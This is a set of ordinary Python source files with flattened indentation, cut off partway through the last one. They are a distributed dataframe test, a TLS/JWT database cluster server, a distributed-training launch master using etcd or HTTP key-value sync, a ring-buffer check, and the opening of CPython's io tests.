async def my_rank(state):
return state["rank"]
def _test_local_cluster(protocol):
with LocalCluster(
protocol=protocol,
dashboard_address=None,
n_workers=4,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster) as client:
comms = CommsContext(client)
assert sum(comms.run(my_rank)) == sum(range(4))
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_local_cluster(protocol):
p = mp.Process(target=_test_local_cluster, args=(protocol,))
p.start()
p.join()
assert not p.exitcode
def _test_dataframe_merge(backend, protocol, n_workers):
with LocalCluster(
protocol=protocol,
dashboard_address=None,
n_workers=n_workers,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster) as client:
comms = CommsContext(client)
nrows = n_workers * 10
# Let's make some dataframes that we can join on the "key" column
df1 = pd.DataFrame({"key": np.arange(nrows), "payload1": np.arange(nrows)})
key = np.arange(nrows)
np.random.shuffle(key)
df2 = pd.DataFrame(
{"key": key[nrows // 3 :], "payload2": np.arange(nrows)[nrows // 3 :]}
)
expected = df1.merge(df2).set_index("key")
if backend == "cudf":
df1 = cudf.DataFrame.from_pandas(df1)
df2 = cudf.DataFrame.from_pandas(df2)
ddf1 = dd.from_pandas(df1, npartitions=n_workers + 1)
ddf2 = dd.from_pandas(
df2, npartitions=n_workers - 1 if n_workers > 1 else 1
)
ddf3 = dataframe_merge(ddf1, ddf2, on="key").set_index("key")
got = ddf3.compute()
if backend == "cudf":
got = got.to_pandas()
got.index.names = ["key"] # TODO: this shouldn't be needed
pd.testing.assert_frame_equal(got, expected)
@pytest.mark.parametrize("nworkers", [1, 2, 4])
@pytest.mark.parametrize("backend", ["pandas", "cudf"])
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_dataframe_merge(backend, protocol, nworkers):
p = mp.Process(target=_test_dataframe_merge, args=(backend, protocol, nworkers))
p.start()
p.join()
assert not p.exitcode
|
server.py
|
import jwt
import getpass
import os
import time
import shutil
from pathlib import Path
import json
import logging
import traceback
import socketserver
import ssl
import secrets
import threading
import pyarrow as pa
from multiprocessing import Process, cpu_count, Event, Manager, Lock
from loadit.resource_lock import ResourceLock
from loadit.database import Database, create_database, parse_query
from loadit.sessions import Sessions
from loadit.connection import Connection
from loadit.connection_tools import recv_tables, get_ip, find_free_port
from loadit.misc import humansize, get_hasher, hash_bytestr
import loadit.log as log
SERVER_PORT = 8080
class CentralQueryHandler(socketserver.BaseRequestHandler):
def handle(self):
connection = self.server.connection
query = connection.recv()
self.server.authorize(query)
request_type = query['request_type']
log_request = True
# WORKER REQUESTS
if request_type == 'add_worker':
self.server.add_worker(tuple(query['worker_address']), query['databases'], query['backup'])
elif request_type == 'remove_worker':
self.server.remove_worker(tuple(query['worker_address']))
elif request_type == 'acquire_worker':
connection.send({'worker_address': self.server.acquire_worker(node=query['node'])})
elif request_type == 'release_worker':
if 'databases' in query:
self.server.nodes[query['worker_address'][0]].databases = query['databases']
if query['worker_address'][0] == self.server.server_address[0]:
self.server.databases = query['databases']
self.server.release_worker(tuple(query['worker_address']))
elif request_type == 'list_databases':
connection.send(self.server.databases)
# CLIENT REQUESTS
elif request_type == 'authentication':
connection.send({'msg': 'Logged in'})
elif request_type == 'shutdown':
if query['node']:
self.server.shutdown_node(query['node'])
connection.send({'msg': 'Node shutdown'})
else:
threading.Thread(target=self.server.shutdown).start()
connection.send({'msg': 'Cluster shutdown'})
elif request_type == 'cluster_info':
connection.send(self.server.info().encode())
elif request_type == 'add_session':
self.server.sessions.add_session(query['user'], session_hash=query['session_hash'],
is_admin=query['is_admin'],
create_allowed=query['create_allowed'],
databases=query['databases'])
connection.send({'msg': "User '{}' added".format(query['user'])})
elif request_type == 'remove_session':
self.server.sessions.remove_session(query['user'])
connection.send({'msg': "User '{}' removed".format(query['user'])})
elif request_type == 'list_sessions':
connection.send({'sessions': list(self.server.sessions.sessions.values())})
elif request_type == 'sync_databases':
self.server.sync_databases(query['nodes'], query['databases'], connection)
else: # REDIRECTED REQUESTS
log_request = False
if request_type != 'create_database' and query['path'] not in self.server.databases:
raise ValueError("Database '{}' not available!".format(query['path']))
if request_type in ('create_database', 'new_batch',
'restore_database', 'remove_database',
'add_attachment', 'remove_attachment'):
node = self.server.server_address[0]
else:
node = None
connection.send({'redirection_address': self.server.acquire_worker(node=node, database=query['path'])})
if log_request:
log_msg = "ip: {}, user: {}, request: {}, database: {}, in: {}, out: {}"
if request_type == 'release_worker':
if not query['is_error']:
self.server.log.info(log_msg.format(query['client_address'],
query['user'],
query['request'],
query['database'],
humansize(query['nbytes_in']),
humansize(query['nbytes_out'])))
else:
self.server.log.info(log_msg.format(self.request.getpeername()[0],
self.server.current_session['user'],
request_type,
None,
humansize(connection.nbytes_in),
humansize(connection.nbytes_out)))
class WorkerQueryHandler(socketserver.BaseRequestHandler):
def handle(self):
connection = self.server.connection
self.server.log_handler = log.ConnectionHandler(connection)
self.server.log_handler.setLevel(logging.INFO)
self.server.log_handler.setFormatter(logging.Formatter('%(message)s'))
self.server.log.addHandler(self.server.log_handler)
query = connection.recv()
self.server.authorize(query)
request_type = query['request_type']
if request_type == 'shutdown':
self.server._shutdown_request = True
threading.Thread(target=self.server.shutdown).start()
elif request_type == 'list_databases':
connection.send(self.server.databases._getvalue())
elif request_type == 'sync_databases':
self.server.sync_databases(query['nodes'], query['databases'], connection)
elif request_type == 'recv_databases':
self.server.recv_databases(connection)
elif request_type == 'remove_database':
self.server.current_database = query['path']
with self.server.database_lock.acquire(query['path']):
shutil.rmtree(os.path.join(self.server.root_path, query['path']))
connection.send({'msg': "Database '{}' removed".format(query['path'])})
del self.server.databases[query['path']]
else:
self.server.current_database = query['path']
with self.server.database_lock.acquire(query['path'],
block=(request_type in ('create_database',
'new_batch',
'restore_database',
'add_attachment',
'remove_attachment'))):
path = os.path.join(self.server.root_path, query['path'])
if request_type == 'create_database':
if query['path'] in self.server.databases.keys():
raise FileExistsError(f"Database already exists at '{query['path']}'!")
db = create_database(path)
else:
db = Database(path)
if request_type == 'check':
connection.send({'corrupted_files': db.check(), 'header': None})
return
elif request_type == 'query':
batch = db.query(**parse_query(query))
elif request_type == 'new_batch':
connection.send(db._get_tables_specs())
db.new_batch(query['files'], query['batch'], query['comment'], table_generator=recv_tables(connection))
elif request_type == 'restore_database':
db.restore(query['batch'])
elif request_type == 'add_attachment':
if query['file'] in db.header.attachments:
raise FileExistsError(f"Already existing attachment!")
attachment_file = os.path.join(path, '.attachments', os.path.basename(query['file']))
connection.send(b'proceed')
connection.recv_file(attachment_file)
db.add_attachment(attachment_file, copy=False)
elif request_type == 'remove_attachment':
db.remove_attachment(query['name'])
elif request_type == 'download_attachment':
if query['name'] not in db.header.attachments:
raise FileNotFoundError(f"Attachment not found!")
attachment_file = os.path.join(path, '.attachments', query['name'])
connection.send({'msg': f"Downloading '{query['name']}' ({humansize(os.path.getsize(attachment_file))})..."})
connection.send_file(attachment_file)
self.server.log.info(f"Attachment '{query['name']}' downloaded")
if self.server.current_session['database_modified']:
self.server.databases[query['path']] = get_database_hash(os.path.join(path, '##header.json'))
if request_type in ('header', 'create_database',
'new_batch', 'restore_database',
'add_attachment', 'remove_attachment'):
header = db.header.__dict__
else:
header = None
db = None
try:
batch_message = get_batch_message(batch)
connection.send({'msg': f"Transferring query results ({humansize(len(batch_message))})...", 'header': header})
connection.send(batch_message, 'buffer')
except NameError:
connection.send({'header': header})
class DatabaseServer(socketserver.TCPServer):
allow_reuse_address = True
request_queue_size = 5
def __init__(self, server_address, query_handler, root_path, certfile, debug=False):
self.context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.context.load_cert_chain(certfile)
super().__init__(server_address, query_handler)
self.root_path = root_path
self.databases = None
self.master_key = None
self.current_session = None
self._debug = debug
self._done = Event()
def wait(self):
self._done.wait()
self._done.clear()
def server_activate(self):
super().server_activate()
self.socket = self.context.wrap_socket(self.socket, server_side=True)
def serve_forever(self, *args, **kwargs):
try:
super().serve_forever(*args, **kwargs)
finally:
self.master_key = None
def handle_error(self, request, client_address):
self.current_session['is_error'] = True
try:
self.connection.send(traceback.format_exc(), 'exception')
except BrokenPipeError:
pass
def refresh_databases(self):
self.databases = get_local_databases(self.root_path)
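    # Requests authenticate in one of three ways: a dict carrying user/password
    # (interactive login, answered with the master key for admins requesting it, or with
    # a signed JWT), the raw master key itself (trusted server-to-server calls), or a JWT
    # previously issued by this server.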
def verify_request(self, request, client_address):
error_msg = 'Access denied!'
try:
self.connection = Connection(socket=request)
data = self.connection.recv()
if type(data) is dict:
if 'password' in data: # User login
try:
self.current_session = self.sessions.get_session(data['user'], data['password'])
except KeyError:
error_msg = 'Wrong username or password!'
raise PermissionError()
from loadit.__init__ import __version__
if data['version'].split('.')[-1] != __version__.split('.')[-1]:
error_msg = f"Not supported version! Update to version: '{__version__}'"
raise PermissionError()
if data['request'] == 'master_key':
if not self.current_session['is_admin']:
error_msg = 'Not enough privileges!'
raise PermissionError()
self.connection.send(self.master_key)
else:
authentication = jwt.encode(self.current_session, self.master_key)
self.connection.send(authentication)
else:
raise PermissionError()
elif data == self.master_key: # master key
self.current_session = {'is_admin': True}
else: # JSON Web Token
try:
self.current_session = jwt.decode(data, self.master_key)
except Exception:
error_msg = 'Invalid token!'
raise PermissionError()
return True
except PermissionError:
self.connection.send(error_msg, 'exception')
return False
except Exception:
self.handle_error(request, client_address)
return False
def authorize(self, query):
self.current_session['request_type'] = query['request_type']
self.current_session['is_error'] = False
if not self.current_session['is_admin']:
if (query['request_type'] in ('shutdown', 'add_worker', 'remove_worker',
'release_worker', 'acquire_worker',
'sync_databases', 'recv_databases',
'add_session', 'remove_session', 'list_sessions') or
query['request_type'] == 'create_database' and not self.current_session['create_allowed'] or
query['request_type'] in ('new_batch', 'restore_database', 'remove_database',
'add_attachment', 'remove_attachment') and
                (not self.current_session['databases'] or query['path'] not in self.current_session['databases'])):
raise PermissionError('Not enough privileges!')
if query['request_type'] in ('recv_databases', 'new_batch', 'restore_database',
'create_database', 'remove_database',
'add_attachment', 'remove_attachment'):
self.current_session['database_modified'] = True
else:
self.current_session['database_modified'] = False
def send(self, server_address, msg, recv=False):
try:
connection = Connection(server_address)
connection.send(self.master_key)
connection.recv()
connection.send(msg)
if recv:
return connection.recv()
finally:
connection.kill()
def request(self, server_address, msg):
return self.send(server_address, msg, recv=True)
class CentralServer(DatabaseServer):
def __init__(self, root_path, certfile, debug=False):
super().__init__((get_ip(), SERVER_PORT), CentralQueryHandler, root_path, certfile, debug)
self.certfile = certfile
self.log = logging.getLogger('central_server')
self.refresh_databases()
self.sessions = None
self.nodes = dict()
def start(self, sessions_file=None):
if sessions_file:
password = getpass.getpass('password: ')
self.sessions = Sessions(sessions_file)
else:
sessions_file = os.path.join(self.root_path, 'sessions.json')
if os.path.exists(sessions_file):
password = getpass.getpass('password: ')
self.sessions = Sessions(sessions_file)
else:
while True:
password = getpass.getpass('password: ')
password_confirm = getpass.getpass('confirm password: ')
if password == password_confirm:
break
else:
print('Password does not match the confirm password. Please enter it again:')
self.sessions = Sessions(sessions_file, password)
manager = Manager()
databases = manager.dict(self.databases)
locked_databases = manager.dict()
start_workers(self.server_address, self.root_path, self.certfile, manager, 'admin', password, databases, locked_databases,
n_workers=cpu_count() - 1, debug=self._debug)
print('Address: {}:{}'.format(*self.server_address))
log.disable_console()
self.master_key = secrets.token_bytes()
self.serve_forever()
self.log.info('Cluster shutdown')
def shutdown(self):
for node in list(self.nodes):
self.shutdown_node(node)
self.wait()
super().shutdown()
def shutdown_node(self, node):
for worker in list(self.nodes[node].workers):
self.send(worker, {'request_type': 'shutdown'})
def info(self):
info = list()
info.append(f"user: {self.current_session['user']}")
if self.current_session['is_admin']:
info.append(f"administrator privileges")
elif self.current_session['create_allowed']:
info.append(f"regular privileges; database creation allowed")
else:
info.append(f"regular privileges")
info.append(f"address: {self.server_address}")
info.append(f"\n{len(self.nodes)} nodes ({sum(len(node.workers) for node in self.nodes.values())} workers):")
for node_address, node in self.nodes.items():
info.append(f" '{node_address}': {len(node.workers)} workers ({node.get_queue()} job/s in progress)")
if node.backup:
info[-1] += ' (backup mode)'
if self.databases:
info.append(f"\n{len(self.databases)} databases:")
for database in self.databases:
if not self.current_session['is_admin'] and (not self.current_session['databases'] or
database not in self.current_session['databases']):
info.append(f" '{database}' [read-only]")
else:
info.append(f" '{database}'")
return '\n'.join(info)
def add_worker(self, worker, databases, backup):
if worker[0] not in self.nodes:
self.nodes[worker[0]] = Node([worker], databases, backup)
else:
self.nodes[worker[0]].workers[worker] = 0
def remove_worker(self, worker):
del self.nodes[worker[0]].workers[worker]
if not self.nodes[worker[0]].workers:
del self.nodes[worker[0]]
if len(self.nodes) == 0:
self._done.set()
def acquire_worker(self, node=None, database=None):
if not node:
for node in sorted(self.nodes, key=lambda x: self.nodes[x].get_queue()):
if (database in self.nodes[node].databases and
(not database in self.databases or
self.nodes[node].databases[database] == self.databases[database])):
break
worker = self.nodes[node].get_worker()
self.nodes[worker[0]].workers[worker] += 1
return worker
def release_worker(self, worker):
self.nodes[worker[0]].workers[worker] -= 1
def sync_databases(self, nodes, databases, connection):
if not nodes:
nodes = list(self.nodes)
try:
nodes.remove(self.server_address[0])
except ValueError:
pass
nodes = {node: self.nodes[node].backup for node in nodes}
if not nodes:
raise ValueError('At least 2 nodes are required in order to sync them!')
connection.send({'request_type': 'sync_databases',
'nodes': nodes, 'databases': databases,
'redirection_address': self.acquire_worker(node=self.server_address[0])})
def shutdown_request(self, request):
super().shutdown_request(request)
self.current_session = None
self.connection = None
class Node(object):
def __init__(self, workers, databases, backup):
self.workers = {worker: 0 for worker in workers}
self.databases = databases
self.backup = backup
def get_worker(self):
return sorted(self.workers, key= lambda x: self.workers[x])[0]
def get_queue(self):
return sum(queue for queue in self.workers.values())
class WorkerServer(DatabaseServer):
def __init__(self, server_address, central_address, root_path, certfile,
databases, main_lock, database_lock, backup=False, debug=False):
super().__init__(server_address, WorkerQueryHandler, root_path, certfile, debug)
self.log = logging.getLogger()
self.central = central_address
self.databases = databases
self.current_database = None
self.main_lock = main_lock
self.database_lock = database_lock
self.backup = backup
self._shutdown_request = False
def start(self, user, password):
try:
connection = Connection(self.central)
from loadit.__init__ import __version__
connection.send({'user': user,
'password': password,
'request': 'master_key',
'version': __version__})
self.master_key = connection.recv()
connection.send({'request_type': 'add_worker',
'worker_address': self.server_address,
'databases': self.databases._getvalue(),
'backup': self.backup})
finally:
connection.kill()
log.disable_console()
self.serve_forever()
def shutdown(self):
self.send(self.central, {'request_type': 'remove_worker',
'worker_address': self.server_address})
super().shutdown()
def shutdown_request(self, request):
self.log.handlers.remove(self.log_handler)
client_address = request.getpeername()[0]
super().shutdown_request(request)
if not self._shutdown_request:
data = {'request_type': 'release_worker',
'worker_address': self.server_address,
'nbytes_in': self.connection.nbytes_in,
'nbytes_out': self.connection.nbytes_out,
'request': self.current_session['request_type'],
'client_address': client_address,
'user': self.current_session['user'],
'database': self.current_database,
'is_error': self.current_session['is_error']}
if self.current_session['database_modified']:
data['databases'] = self.databases._getvalue()
self.send(self.central, data)
self.current_database = None
self.current_session = None
self.connection = None
def sync_databases(self, nodes, databases, client_connection):
self.refresh_databases()
if databases:
update_only = False
databases = {database: self.databases[database] for database in databases if
database in self.databases}
else:
update_only = True
databases = self.databases
for node, backup in nodes.items():
worker = tuple(self.request(self.central, {'request_type': 'acquire_worker', 'node': node})[1]['worker_address'])
client_connection.send({'msg': f"Syncing node '{node}'..."})
try:
connection = Connection(worker)
connection.send(self.master_key)
connection.recv()
connection.send({'request_type': 'recv_databases'})
remote_databases = connection.recv()
for database in databases:
if (not update_only and (database not in remote_databases or
databases[database] != remote_databases[database]) or
update_only and (not backup and database in remote_databases and databases[database] != remote_databases[database] or
backup and (database not in remote_databases or databases[database] != remote_databases[database]))):
with self.database_lock.acquire(database, block=False):
database_path = Path(self.root_path) / database
files = [file for pattern in ('**/*header.*', '**/*.bin') for file in database_path.glob(pattern)]
connection.send({'database': database, 'msg': '',
'files': [str(file.relative_to(database_path)) for file in files]})
client_connection.send({'msg': f" Syncing database '{database}' ({len(files)} files; {humansize(sum(os.path.getsize(file) for file in files))})..."})
for file in files:
connection.send_file(file)
msg = connection.recv()
connection.send({'msg': "Done!"})
finally:
connection.kill()
client_connection.send({'msg': f"Done!"})
def recv_databases(self, connection):
self.refresh_databases()
connection.send(self.databases._getvalue())
data = connection.recv()
while data['msg'] != 'Done!':
with self.database_lock.acquire(data['database']):
path = Path(self.root_path) / data['database']
path_temp = path.parent / (path.name + '_TEMP')
path_temp.mkdir()
try:
for file in data['files']:
file = path_temp / file
file.parent.mkdir(exist_ok=True)
connection.recv_file(file)
connection.send(b'OK')
if os.path.exists(path):
shutil.rmtree(path)
path_temp.rename(path)
except Exception as e:
shutil.rmtree(path_temp)
raise e
data = connection.recv()
def refresh_databases(self):
with self.main_lock:
self.databases.clear()
self.databases.update(get_local_databases(self.root_path))
return self.databases._getvalue()
def start_worker(server_address, central_address, root_path, certfile,
databases, main_lock, locks, locked_databases, user, password, backup, debug):
import loadit.queries # Pre-load this heavy module
database_lock = ResourceLock(main_lock, locks, locked_databases)
worker = WorkerServer(server_address, central_address, root_path, certfile,
databases, main_lock, database_lock, backup, debug)
worker.start(user, password)
def start_workers(central_address, root_path, certfile, manager, user, password, databases, locked_databases,
n_workers=None, backup=False, debug=False):
if not n_workers:
n_workers = cpu_count()
main_lock = Lock()
locks = [Lock() for lock in range(n_workers)]
host = get_ip()
workers = list()
for i in range(n_workers):
workers.append(Process(target=start_worker, args=((host, find_free_port()), central_address, root_path, certfile,
databases, main_lock, locks, locked_databases,
user, password, backup, debug)))
workers[-1].start()
return workers
def start_node(central_address, root_path, certfile, backup=False, debug=False):
user = input('user: ')
password = getpass.getpass('password: ')
manager = Manager()
databases = manager.dict(get_local_databases(root_path))
locked_databases = manager.dict()
workers = start_workers(central_address, root_path, certfile, manager, user, password, databases, locked_databases,
backup=backup, debug=debug)
for worker in workers:
worker.join()
print('Node shutdown')
def get_local_databases(root_path):
databases = dict()
for header_file in Path(root_path).glob('**/##header.json'):
database = str(header_file.parent.relative_to(root_path).as_posix())
databases[database] = get_database_hash(header_file)
return databases
def get_database_hash(header_file):
with open(header_file, 'rb') as f:
return hash_bytestr(f, get_hasher('sha256'))
def get_batch_message(batch):
sink = pa.BufferOutputStream()
writer = pa.RecordBatchStreamWriter(sink, batch.schema)
writer.write_batch(batch)
writer.close()
return sink.get_result()
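# A hypothetical sketch of the receiving side (not part of this module): the
# buffer produced by get_batch_message() can be turned back into a RecordBatch
# with pyarrow's IPC stream reader; the exact entry point depends on the
# pyarrow version in use.
#
#     reader = pa.ipc.open_stream(message_buffer)
#     batch = reader.read_next_batch()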
|
master.py
|
# Copyright 2022 kuizhiqing
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ..utils.kv_client import KVClient
from ..utils.kv_server import KVServer
import time
import sys
import six
import threading
import copy
import random
ETCD_PROTOCAL = 'etcd://'
MODULE_NAME = 'launch'
class Master(object):
'''
    Master is a distributed store designed to exchange info among nodes
'''
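    # Hypothetical usage sketch (ctx, pod_name, endpoint and size are
    # illustrative placeholders, not defined in this module):
    #
    #     master = Master.factory(ctx)              # HTTPMaster or ETCDMaster
    #     peers, rank = master.sync_peers("/job/x", pod_name, endpoint, size)
    #     master.stop()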
MAIN = "main"
STANDBY = "standby"
PATICIPANT = "participant"
def __init__(self, ctx):
self.ctx = ctx
self.server = None
self.initialized = False
self.endpoint = None
def stop(self):
raise NotImplementedError
def set_status(self, status):
pass
def get_status(self):
return None
def restart_peer(self):
pass
def sync_peers(self, prefix, key, value, size, rank=-1) -> (list, int):
raise NotImplementedError
@classmethod
def factory(cls, ctx):
if ctx.args.master and ctx.args.master.startswith(ETCD_PROTOCAL):
return ETCDMaster(ctx)
else:
return HTTPMaster(ctx)
class HTTPMaster(Master):
def lazy_init(self):
if self.initialized:
return
self.role = Master.PATICIPANT
if self.ctx.args.master:
self.endpoint = self.ctx.args.master
ip, port = self.endpoint.split(':')
if ip in ['127.0.0.1', self.ctx.node.ip]:
time.sleep(2 * random.random())
while not self.ctx.node.is_server_ready(ip, int(port)):
try:
self.server = KVServer(int(port))
self.role = Master.MAIN
break
except Exception as e:
self.ctx.logger.warning("start master failed {}".format(
e))
time.sleep(0.1)
continue
else:
port = self.ctx.node.get_free_port()
self.endpoint = "{}:{}".format(self.ctx.node.ip, port)
self.server = KVServer(port)
self.role = Master.MAIN
print("Copy the following command to other nodes to run.")
cmd = [
sys.executable.split('/')[-1], "-m", MODULE_NAME
]
cmd.extend(["--master", self.endpoint])
cmd.extend(sys.argv[1:])
print("-" * 80)
print(" ".join(cmd))
print("-" * 80)
if self.ctx.args.rank >= 0:
self.ctx.logger.warning(
"--rank set in the command may not compatible in auto mode")
if '127.0.0.1' in self.endpoint:
self.endpoint = self.endpoint.replace('127.0.0.1', self.ctx.node.ip)
self.client = KVClient(self.endpoint)
self.initialized = True
self._start_server()
def _start_server(self):
if self.server and not self.server.started:
self.server.start()
self.ctx.logger.debug("KV server start at {}".format(self.endpoint))
def _stop_server(self):
if self.server and not self.server.stopped:
self.server.stop()
self.ctx.logger.debug("KV server stopped")
def stop(self):
self._stop_server()
def sync_peers(self, prefix, key, value, size, rank=-1) -> (list, int):
if size < 2:
return [value], 0
self.ctx.logger.info("Waiting peer start...")
self.lazy_init()
while not self.ctx.status.is_done():
if self.client.wait_server_ready(timeout=5):
break
else:
self.ctx.logger.warning("master not ready")
time.sleep(0.1)
        # 'aaaaaa' sorts before any real key, ensuring the main pod (the master server) ends up as rank 0
ky = 'aaaaaa' if rank < 0 and self.role == Master.MAIN else key
k = "{}/{}/{}".format(prefix, ky, rank)
while not self.ctx.status.is_done():
if not self.client.put(k, value):
self.ctx.logger.warning("put value failed")
time.sleep(0.1)
continue
rjson = self.client.get_prefix(prefix)
self.ctx.logger.debug("sync peers {}".format(rjson))
if rjson and len(rjson) == size:
if rank < 0:
keys = list(rjson.keys())
keys.sort()
ret = [rjson[k] for k in keys]
idx = ret.index(value)
return ret, idx
else:
ret = [None] * size
for k, v in rjson.items():
ret[int(k.split('/')[-1])] = v
return ret, rank
else:
time.sleep(0.5)
return [], 0
class ETCDMaster(Master):
def __init__(self, ctx):
super().__init__(ctx)
if self.ctx.args.master:
# etcd://localhost:2379
            # str.strip() removes a set of characters, not a prefix, so slice off the scheme instead
            self.endpoint = self.ctx.args.master[len(ETCD_PROTOCAL):]
import etcd3
host, port = self.endpoint.split(':')
self.client = etcd3.client(host=host, port=port)
def sync_peers(self, prefix, key, value, size, rank=-1) -> (list, int):
'''
        sync_peers gathers all values stored for key under the scope prefix.
        The result is always sorted, either by rank or alphabetically by pod.name.
'''
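        # For reference, the keys written below have the shape
        # "<prefix>/<key>/<rank>" (e.g. a hypothetical "/job/group/pod-0/-1"
        # when the rank is unknown), so get_prefix(prefix) returns exactly one
        # entry per participating pod.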
if size < 2:
return [value], 0
self.ctx.logger.info("Waiting peer start...")
path = "{}/{}/{}".format(prefix, key, rank)
self.client.delete_prefix(prefix)
self.ctx.logger.debug("sync path {} value {}".format(path, value))
while not self.ctx.status.is_done():
self.client.put(path, six.b(value))
result = [i for i in self.client.get_prefix(prefix)]
result = copy.deepcopy(result)
self.ctx.logger.debug("sync peers {}".format(result))
if len(result) == size:
if rank < 0:
keys = [six.ensure_str(i[1].key) for i in result]
sorted_keys = [six.ensure_str(i[1].key) for i in result]
sorted_keys.sort()
values = [six.ensure_str(i[0]) for i in result]
ret = [values[keys.index(k)] for k in sorted_keys]
idx = ret.index(value)
return ret, idx
else:
ret = [None] * size
for v, k in result:
ii = int(six.ensure_str(k.key).split('/')[-1])
if ii < 0:
self.ctx.logger.error(
"rank {} error in sync".format(ii))
ret[ii] = six.ensure_str(v)
return ret, rank
else:
time.sleep(0.5)
def register_heartbeat(self, job_id, pod_id, ttl=10):
if hasattr(self, 'heartbeat_prefix'):
self.ctx.logger.warning("Heartbeat already done")
return
self.job_prefix = '/launch/{}'.format(job_id)
self.heartbeat_prefix = '{}/heartbeat'.format(self.job_prefix)
lease = self.client.lease(ttl)
#self.client.delete_prefix(self.job_prefix)
beat_path = "{}/{}".format(self.heartbeat_prefix, pod_id)
self.client.put(beat_path, six.b(pod_id), lease=lease)
def _beat_watch(event):
self.ctx.status.restart()
beat_watch = self.client.add_watch_prefix_callback(
self.heartbeat_prefix, _beat_watch)
def _heartbeat():
while not self.ctx.status.is_done():
try:
lease.refresh()
if pod_id not in self.fetch_peer_alive():
self.client.put(beat_path, six.b(pod_id), lease=lease)
self.ctx.logger.debug("Heartbeat register again")
except Exception as e:
self.ctx.logger.error("Heartbeat error {}".format(e))
time.sleep(ttl / 2)
self.ctx.logger.debug("Heartbeat done")
self.client.cancel_watch(beat_watch)
self.beat_thread = threading.Thread(
name='heartbeat', target=_heartbeat, daemon=True)
self.beat_thread.start()
def fetch_peer_alive(self):
peer_alive = [
six.ensure_str(i[0])
for i in self.client.get_prefix(self.heartbeat_prefix)
]
self.ctx.logger.debug("peer alive {}".format(peer_alive))
return peer_alive
def wait_peer_ready(self, replicas_min, replicas_max, timeout):
end = time.time() + timeout
while not self.ctx.status.is_done() and time.time() < end:
if len(self.fetch_peer_alive()) == replicas_max:
return (True, replicas_max)
else:
time.sleep(0.5)
np = len(self.fetch_peer_alive())
if np >= replicas_min and np <= replicas_max:
return (True, np)
else:
return (False, np)
def restart_peer(self):
self.client.delete_prefix(self.heartbeat_prefix)
def set_status(self, status):
assert self.client.put(
self.job_prefix, six.b(status),
lease=self.client.lease(600)), "set status failed {}".format(status)
def get_status(self):
return six.ensure_str(self.client.get(self.job_prefix)[0] or '')
def stop(self):
if hasattr(self, 'beat_thread'):
self.ctx.status.done()
# TODO(kuizhiqing) thread should exit
#self.beat_thread.join()
|
verify_buffer.py
|
"""
"""
import threading
from data_pipe.any_buffer import AnyBufferCore
def verify_buffer_sync(buffer: AnyBufferCore):
print()
print(f"buffer: {buffer}")
count = buffer.ring_size * 10
source = []
target = []
def buffer_writer_sync():
for index in range(count):
source.append(index)
buffer.invoke_writer_sync(index)
def buffer_reader_sync():
for index in range(count):
index = buffer.invoke_reader_sync()
target.append(index)
thread_writer = threading.Thread(target=buffer_writer_sync, daemon=True)
thread_reader = threading.Thread(target=buffer_reader_sync, daemon=True)
thread_writer.start()
thread_reader.start()
thread_writer.join()
thread_reader.join()
assert source == target
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
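# A minimal, hypothetical illustration of that pattern (the Example* names are
# not part of this suite): the base test reads the class under test from an
# attribute, and two thin subclasses bind it to the C and Python modules.
#
#     class ExampleTest(unittest.TestCase):
#         def test_roundtrip(self):
#             f = self.BytesIO()
#             f.write(b"data")
#             self.assertEqual(f.getvalue(), b"data")
#
#     class CExampleTest(ExampleTest):
#         BytesIO = io.BytesIO
#
#     class PyExampleTest(ExampleTest):
#         BytesIO = pyio.BytesIO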
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
from test.support import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
